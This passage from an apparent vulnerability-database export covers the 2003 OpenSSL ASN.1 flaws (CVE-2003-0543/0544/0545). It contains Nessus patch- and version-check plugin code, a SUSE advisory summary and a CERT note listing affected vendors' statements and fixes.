script_xref(name:\"HP\", value:\"HPSBUX0310\");\n script_xref(name:\"HP\", value:\"SSRT3622\");\n\n script_name(english:\"HP-UX PHSS_29891 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 Virtualvault 4.6 TGP update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.\"\n );\n # http://www.openssl.org/news/secadv/20030930.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_29891 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/11/10\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2004/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHSS_29891 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_29891\", \"PHSS_30646\", \"PHSS_34165\", \"PHSS_35480\", \"PHSS_35559\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"VaultTGP.TGP-CORE\", version:\"A.04.60\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:32:55", "description": "According to its banner, the remote server is running a version of\nOpenSSL that is earlier than 0.9.7c. \n\nA remote attacker could trigger a denial of service or even execute\narbitrary code by using an invalid client certificate.", "edition": 24, "published": "2012-01-04T00:00:00", "title": "OpenSSL < 0.9.7c ASN.1 Decoding Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_0_9_7C.NASL", "href": "https://www.tenable.com/plugins/nessus/17753", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17753);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/16 14:09:14\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_bugtraq_id(8732);\n script_xref(name:\"CERT-CC\", value:\"CA-2003-26\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"380864\");\n\n script_name(english:\"OpenSSL < 0.9.7c ASN.1 Decoding Vulnerabilities\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"Arbitrary code could be executed on the remote server.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote server is running a version of\nOpenSSL that is earlier than 0.9.7c. \n\nA remote attacker could trigger a denial of service or even execute\narbitrary code by using an invalid client certificate.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21247112\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 0.9.7c or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\");\n script_require_keys(\"openssl/port\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\n\nopenssl_check_version(fixed:'0.9.7c', min:'0.9.7', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:29:41", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "description": "OpenSSL is an implementation of the Secure Socket Layer (SSL v2/3) and Transport Layer Security (TLS v1) protocol. While checking the openssl implementation with a tool-kit from NISCC several errors were revealed most are ASN.1 encoding issues that causes a remote denial-of-service attack on the server side and possibly lead to remote command execution.", "edition": 1, "modified": "2003-10-01T17:18:32", "published": "2003-10-01T17:18:32", "id": "SUSE-SA:2003:043", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-09/msg00016.html", "title": "remote denial-of-service in openssl", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:44:06", "bulletinFamily": "info", "cvelist": ["CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545"], "description": "### Overview \n\nMultiple vulnerabilities exist in different vendors' SSL/TLS implementations. The impacts of these vulnerabilities include remote execution of arbitrary code, denial of service, and disclosure of sensitive information.\n\n### Description \n\nThe U.K. National Infrastructure Security Co-ordination Centre (NISCC) has reported multiple vulnerabilities in different vendors' [](<http://www.openssl.org/>)implementations of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications such as HTTP, IMAP, POP3, LDAP, and others. Clients and servers exchange authentication information in X.509 certificates. While the SSL and TLS protocols do not use ASN.1/BER to communicate at the application layer, they do require an ASN.1 parser to encode and decode X.509 certificates and other cryptographic elements (e.g., PKCS#1 encoded RSA values and PKCS#7 encoded S/MIME parts) at the presentation layer.\n\nA test suite developed by NISCC has exposed vulnerabilities in a variety of SSL/TLS implementations. While most of these vulnerabilities exist in ASN.1 parsing routines, some vulnerabilities may occur elsewhere. Note that cryptographic libraries that implement SSL/TLS frequently provide more general-purpose cryptographic utility. In such libraries, it is common for ASN.1 parsing code to be shared between SSL/TLS and other cryptographic functions. \n \nDue to the general lack of specific vulnerability information, this document covers multiple vulnerabilities in different SSL/TLS implementations. Information about individual vendors is available in the Systems Affected section. Note that VU#104280 broadly covers ASN.1 related vulnerabilities in SSL/TLS implementations other than OpenSSL. VU#255484, VU#732952, VU#380864, VU#686224, and VU#935264 are specific to OpenSSL. \n \nFurther information is available in NISCC advisory [006489/TLS](<http://www.uniras.gov.uk/vuls/2003/006489/tls.htm>). \n \nThis set of vulnerabilities is different from those described in [VU#748355](<http://www.kb.cert.org/vuls/id/748355>)/[CA-2002-23](<http://www.cert.org/advisories/CA-2002-23.html>). \n \n--- \n \n### Impact \n\nThe impacts associated with these vulnerabilities include execution of arbitrary code, denial of service, and disclosure of sensitive information. \n \n--- \n \n### Solution \n\n**Patch or Upgrade** \nApply a patch or upgrade as appropriate. Information about specific vendors is available in the Systems Affected section of this document. \n \n--- \n \n### Vendor Information\n\n104280\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### AppGate Network Security AB __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe default configuration of AppGate is not vulnerable. However some extra functionality which administrators can enable manually may cause the system to become vulnerable. For more details check the AppGate support pages at <http://www.appgate.com/support>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Apple Computer Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nApple: Vulnerable. This is fixed in Mac OS X 10.2.8 which is available from <http://www.apple.com/support/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Check Point __ Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCheck Point products are vulnerable to:\n\nVU#732952 09/04/2003 OpenSSL accepts unsolicited client certificate messages \nVU#380864 09/30/2003 OpenSSL contains integer overflow handling ASN.1 tags (2) \nVU#255484 09/30/2003 OpenSSL contains integer overflow handling ASN.1 tags (1) \n \nA fix will be released by Oct 27th 2003. \n \nCheck Point products are not vulnerable to: \nVU#686224 09/30/2003 OpenSSL does not securely handle invalid public key when configured to ignore errors \nVU#935264 09/30/2003 OpenSSL ASN.1 parser insecure memory deallocation\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Cisco Systems Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease see &lt;<http://www.cisco.com/warp/public/707/cisco-sa-20030930-ssl.shtml>&gt;.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CLSA-2003:751](<http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000751>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Cray Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCray Inc. supports OpenSSL through its Cray Open Software (COS) package. The OpenSSL version in COS 3.4 and earlier is vulnerable. Spr 726919 has been opened to address this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Debian __ Affected\n\nNotified: September 30, 2003 Updated: October 08, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCorrected OpenSSL packages are available in Debian Security Advisory 393, at <http://www.debian.org/security/2003/dsa-393>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### F5 Networks __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nF5 products BIG-IP, 3-DNS, ISMan and Firepass are vulnerable. F5 will have ready security patches for each of these products. Go to [ask.f5.com](<http://ask.f5.com/>) for the appropriate security response instructions for your product.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### FreeBSD __ Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FreeBSD-SA-03:18](<ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:18.openssl.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.linuxsecurity.com/advisories/gentoo_advisory-3705.html>&gt;.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Guardian Digital Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [ESA-20030930-027](<http://www.linuxsecurity.com/advisories/engarde_advisory-3693.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: September 30, 2003 Updated: October 23, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see HPSBUX0310-286 (SSRT3622) and HPSBUX0310-284 (SSRT3622).\n\nFrom [NISCC/006489/OpenSSL](<http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>) and [NISCC/006489/TLS](<http://www.uniras.gov.uk/vuls/2003/006489/tls.htm>): \n \nAt the time of writing this document, HP is investigating the potential impact to HP's optional software products. As further information becomes available HP will provide notice of the availability of necessary patches through the standard security bulletin announcements and through your normal HP Services support channel. \n \nHP-UX - not impacted \nHP Tru64 Unix - not impacted \nHP NonStop Servers - not impacted\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Hitachi __ Affected\n\nNotified: September 30, 2003 Updated: November 11, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nHitachi Web Server is Vulnerable to this issue. Impact is limited to Denial of Service, but process will re-start automatically. Fixes for this issue which will be available shortly. \n\n\nHitachi GR2000 gigabit router series are NOT Vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### IBM __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n[AIX]\n\nThe AIX Security Team is aware of the issues discussed in CERT Vulnerability Notes VU#255484, VU#380864, VU#686224, VU#935264 and VU#732952. \n \nOpenSSL is available for AIX via the AIX Toolbox for Linux. Please note that the Toolbox is made available \"as-is\" and is unwarranted. The Toolbox ships with OpenSSL 0.9.6g which is vulnerable to the issues referenced above. A patched version of OpenSSL will be provided shortly and this vendor statement will be updated at that time. \n \nPlease note that OpenSSH, which is made available through the Expansion Pack is not vulnerable to these issues. \n \n[eServer] \n \nIBM eServer Platform Response \n \nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to [https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&amp;pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to \n<http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be refered to servsec@us.ibm.com.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Ingrian Networks __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nIngrian Networks is aware of this vulnerablity and will issue a security advisory when our investigation is complete.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Juniper Networks __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe OpenSSL code included in domestic versions of JUNOS Internet Software that runs on all M-series and T-series routers is susceptible to these vulnerabilities. The SSL library included in Releases 2.x and 3.x of SDX provisioning software for E-series routers is susceptible to these vulnerabilities.\n\nSolution Implementation \n \nCorrections for all the above vulnerabilities are included in all versions of JUNOS built on or after October 2, 2003. Customers should contact Juniper Networks Technical Assistance Center (JTAC) for instructions on obtaining and installing the corrected code. \n \nSDX software built on or after October 2, 2003, contain SSL libraries with corrected code. Contact JTAC for instructions on obtaining and installing the corrected code.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### MandrakeSoft __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe vulnerabilities referenced by VU#255484, VU#380864, and VU#935264 have been corrected by packages released in our [MDKSA-2003:098](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:098>) advisory.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [NetBSD-SA2003-017](<ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-017.txt.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Nortel Networks __ Affected\n\nNotified: September 30, 2003 Updated: October 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe SSL implementation of the following Nortel Networks products is based on OpenSSL and may be affected by the vulnerabilities identified in NISCC Vulnerability Advisory 006489/OpenSSL:\n\nAlteon Switched Firewall \nAlteon iSD - SSL Accelerator \nContivity \nSuccession Communication Server 2000 - Compact (CS2K - Compact) \nPreside Service Provisioning \n \nOther Nortel Networks products with SSL implementations are being reviewed and this Vendor Statement may be revised. \n \nFor more information please contact \n \nNorth America: 1-800-4NORTEL or 1-800-466-7835 \n \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \n \nContacts for other regions are available at <http://www.nortelnetworks.com/help/contact/global/> \n \nOr visit the eService portal at <http://www.nortelnetworks.com/cs> under Advanced Search. \n \nIf you are a channel partner, more information can be found under <http://www.nortelnetworks.com/pic> under Advanced Search\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Novell __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNovell is reviewing our application portfolio to identify products affected by the vulnerabilities reported by the NISCC. We have the patched OpenSSL code and are reviewing and testing it internally, and preparing patches for our products that are affected. We expect the first patches to become available via our Security Alerts web site (<http://support.novell.com/security-alerts>) during the week of 6 Oct 2003. Customers are urged to monitor our web site for patches to versions of our products that they use and apply them expeditiously.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### OpenBSD __ Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.openbsd.org/errata.html#asn1>&gt;.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### RSA Security __ Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe issues raised in this vulnerability report have been analysed in terms of impact on RSA BSAFE SSL-C, RSA BSAFE SSL-C Micro Edition, and RSA BSAFE Cert-C Micro Edition. None of these issues have been determined by RSA Security to be security critical, the products are either not impacted by the vulnerabilities raised or the impact is limited to additional Denial of Sevice opportunities.\n\nAs part of RSA Security standard product support lifecycle, fixes for those vulnerabilities which are relevant for each product listed will be incorporated in the next maintenance release. RSA Security customers with current support and maintenance contracts may request a software upgrade for new product versions online at &lt;<https://www.rsasecurity.com/go/form_ins.html>&gt;.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRed Hat distributes OpenSSL 0.9.6 in various Red Hat Linux distributions and with the Stronghold secure web server. Updated packages which contain backported patches for these issues are available along with our advisories at the URL below. Users of the Red Hat Network can update their systems using the 'up2date' tool.\n\nRed Hat Enterprise Linux: \n<http://rhn.redhat.com/errata/RHSA-2003-293.html> \n \nRed Hat Linux 7.1, 7.2, 7.3, 8.0: \n<http://rhn.redhat.com/errata/RHSA-2003-291.html> \n \nStronghold 4 cross-platform: \n<http://rhn.redhat.com/errata/RHSA-2003-290.html> \n \nRed Hat distributes OpenSSL 0.9.7 in Red Hat Linux 9. Updated packages which contain backported patches for these issues are available along with our advisory at the URL below. Users of the Red Hat Network can update their systems using the 'up2date' tool. \n \nRed Hat Linux 9: \n<http://rhn.redhat.com/errata/RHSA-2003-292.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### SCO __ Affected\n\nNotified: September 30, 2003 Updated: October 03, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe are aware of the issue and are diligently working on a fix. [[CSSA-2003-SCO.25](<ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.25/CSSA-2003-SCO.25.txt>)]\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### SGI __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSGI acknowledges receiving the vulnerabilities reported by CERT and NISCC. CAN-2003-0543 [VU#255484], CAN-2003-0544 [VU#380864] and CAN-2003-0545 [VU#935264] have been addressed by SGI Security Advisory 20030904-01-P:\n\n<ftp://patches.sgi.com/support/free/security/advisories/20030904-01-P.asc> \n \nNo further information is available at this time. \n \nFor the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported SGI operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on <http://www.sgi.com/support/security/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### SSH Communications Security __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;[http://www.ssh.com/company/newsroom/article/476](<http://www.ssh.com/company/newsroom/article/476/>)&gt; and &lt;[http://www.ssh.com/company/newsroom/article/477](<http://www.ssh.com/company/newsroom/article/477/>)&gt;.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Secure Computing Corporation __ Affected\n\nNotified: September 30, 2003 Updated: October 15, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSidewinder(r) and Sidewinder G2 Firewall(tm) (including all appliances)\n\nSidewinder v5.x and Sidewinder G2 v6.x are not vulnerable to the arbitrary code execution attacks described in this advisory. The Sidewinder's embedded Type Enforcement technology strictly limits the capabilities of each component which implements SSL. Any attempt to exploit this vulnerability in the SSL library code running on the firewall results in an automatic termination of the attacker's connection and multiple Type Enforcement alarms. \n \nAny component attacked by the denial of service (DOS) attacks described in this advisory is automatically restarted by the firewall's watchdog process without interuption of any active connections. However, under some circumstances this DOS could cause a delay in managing the firewall. \n \nTo mitigate this inconvenience, customers should contact Secure Computing Customer Support. \n \nGauntlet(tm) &amp; e-ppliance \n \nGauntlet and e-ppliance do not include any components based on OpenSSL, and are thus immune to these vulnerabilities.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Slackware __ Affected\n\nUpdated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SSA:2003-273-01](<http://www.slackware.com/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.464492>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Stonesoft __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nStonesoft has published a security advisory that addresses the issues in vulnerability notes VU#255484 and VU#104280. The advisory is at <http://www.stonesoft.com/document/art/3040.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 